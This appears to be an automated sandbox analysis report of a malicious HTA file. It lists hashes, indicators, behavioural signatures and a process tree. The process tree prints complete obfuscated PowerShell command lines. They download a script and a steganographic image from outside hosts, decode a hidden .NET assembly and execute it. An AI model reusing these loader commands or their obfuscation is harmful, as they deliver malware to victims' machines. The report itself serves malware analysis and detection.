Analysis
-
max time kernel
46s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
20-12-2024 15:03
Static task
static1
Behavioral task
behavioral1
Sample
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
Resource
win10v2004-20241007-en
General
-
Target
mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
-
Size
15KB
-
MD5
4d74c4d1eddb79b92e94ef09f3437eaa
-
SHA1
f7add01e161ef9b7093cf672afe052648dd457da
-
SHA256
96df1f20a2f78ef6665f8acdf0e9576ac4f7879ec61f5e90d1fcb2ecbb310281
-
SHA512
bf4616e208b0b17c382df381eacaf3bccce0bb70311ca730a6316881cbe3b2f81494ec99e32d4dc8546556dbb487b9f3ac5b836c04e34d343053358a601a36f3
-
SSDEEP
48:3EsYcJaFxYcJeMilzHIM7py4U2b6poz10daCa/bfUTTiuYcJFAVOPG:0LfgtlzF82bPpTTxg+
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2216 powershell.exe 6 2684 powershell.exe 8 2684 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2216 powershell.exe -
pid Process 2684 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2216 powershell.exe 2684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2284 wrote to memory of 1904 2284 mshta.exe 30 PID 2284 wrote to memory of 1904 2284 mshta.exe 30 PID 2284 wrote to memory of 1904 2284 mshta.exe 30 PID 2284 wrote to memory of 1904 2284 mshta.exe 30 PID 1904 wrote to memory of 2216 1904 cmd.exe 32 PID 1904 wrote to memory of 2216 1904 cmd.exe 32 PID 1904 wrote to memory of 2216 1904 cmd.exe 32 PID 1904 wrote to memory of 2216 1904 cmd.exe 32 PID 2216 wrote to memory of 2780 2216 powershell.exe 34 PID 2216 wrote to memory of 2780 2216 powershell.exe 34 PID 2216 wrote to memory of 2780 2216 powershell.exe 34 PID 2216 wrote to memory of 2780 2216 powershell.exe 34 PID 2780 wrote to memory of 1948 2780 csc.exe 35 PID 2780 wrote to memory of 1948 2780 csc.exe 35 PID 2780 wrote to memory of 1948 2780 csc.exe 35 PID 2780 wrote to memory of 1948 2780 csc.exe 35 PID 2216 wrote to memory of 2640 2216 powershell.exe 37 PID 2216 wrote to memory of 2640 2216 powershell.exe 37 PID 2216 wrote to memory of 2640 2216 powershell.exe 37 PID 2216 wrote to memory of 2640 2216 powershell.exe 37 PID 2640 wrote to memory of 2684 2640 WScript.exe 38 PID 2640 wrote to memory of 2684 2640 WScript.exe 38 PID 2640 wrote to memory of 2684 2640 WScript.exe 38 PID 2640 wrote to memory of 2684 2640 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e_ulus43.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9CC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD9CB.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1948
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() | ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5faed65940422721f88a39f7bcb194d5f
SHA11742e7c1dcfe427c6b2f6485e5648593759c5d46
SHA25609ba8b7d8c9e80b6f8105029c919d26a4de9b465f214dbaa7a940e973f2cc014
SHA51251795924a858f0612ab95f4dacd30502db50b49424772685f259c21a6256cbdffce14dcd9e321b7c249c95b68dbd7e1f24301b6323503ae2020aa6e80280fafa
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD530ff3d787ddbe70e1b812386db80e1e2
SHA10b07e5fcfdfc2e765a208f069dc5c3cb4984df7c
SHA2565d4ea46e781957b82fb561ce85e9d930c58f7fe45ea40af5633f18517cc5be08
SHA512c8ab8eff9d651555bb8628c4997a90452e6c389ccd782ac9a3c96dff0f58d205542874a911e85831f1cc68dacec0445be699a354ce67bbfaf3a0504ee0d5e66d
-
Filesize
7KB
MD5a9655651ca757ca5004697005c55afb9
SHA1ec665f7206f706bb218eac7c65a18e2d3a5a02d9
SHA256fea524495f9fddd4a94af21c2c44f7833414cc301b7f738df5e56e1a71835ff0
SHA512d2ed5b9402a904041f8263d2ab71110b31c2c68c0f8430b973f262c7cf3cb670c7b1ee085e502d24d0242e6bfee25ddb5378db10159daf44b1976e2196723df6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5a22745258b16bde393299483ad942dbe
SHA122b1cd1bfa7c899ed39487bf92459355bfe3668e
SHA25666627686d2dac1e31a2f15027a79278c68134cdb10f9e2f12be3a4584277bb6a
SHA512886e181f4a87417290d745469835b1b5c366dbee1a632997f42bdd206be08d73f826de4b013d35ba846557c8d987e0faae5519c5e0e9673d215af5c5fc8357fb
-
Filesize
212KB
MD57f54fcc18cf1595a91bcf1c61df774cf
SHA1298fae69662e298ac46e0e1be5fc679a0f527c22
SHA256891e95aa7d15515df54f91606a27711c7c6bce4be800f6317e5f58843b0ecfb7
SHA5123c368045ebe048ee7e8972e6dcaf92f60772c75a1a2d5cdaae7e6048aac8b7cb8fd266c6632b9b7ff17598162600ba517a71b4c9b90d564e0e7c4ebe193ed3ba
-
Filesize
652B
MD5cbdf1b15b0a411031e37ac5d823f03ec
SHA1e0a1129dacc1b985b4c76fb6763325e51384ab96
SHA2566ef5531b0343af36673bef7fb98e8e1fd8ce93847cd71ca0dfea4029ea0b61fd
SHA5120f9f0155ca04dbb69e28f849c76fe79a8864b6fa2fb11f371464c5582263e26eeb46660453c4a1f842454815bc95eace0e2625cbf1e2f97499dcbdc76e50586f
-
Filesize
485B
MD5b35ae42c67ac0de0078975c9c8744c14
SHA1f85c1973cdf038ad851324c9c021d6b7cdb1db28
SHA2563c45043d7ae00b5a57d1c20a68cbf81fe37151ed53e2ecd11a7d87ca4cec6442
SHA51252e314313cab6577ad9592120009a35b61b2b00d2452ebd627cf5cd7d6e1dfe9cc94cb5dfa5b306867f6823f60bdffe24214b53ba1fc379c10e2908795bf05c5
-
Filesize
309B
MD5044382a61ffcd3ccff70144615e39583
SHA14c997a6d75a9b48ff4e981964ca0ac19e70d4325
SHA256988a56c21d6252223c56a3bc2c2eaa73099aef6a8be07a573d150074b9eb89ca
SHA5125b5f34a8ee4054039cd1761d50e13fe759ba0628064f22825ce23b9640264c6c5d07694a8ad59bc200370176e55bf3ceacf350fdb182e84fbfd8443f43872bc1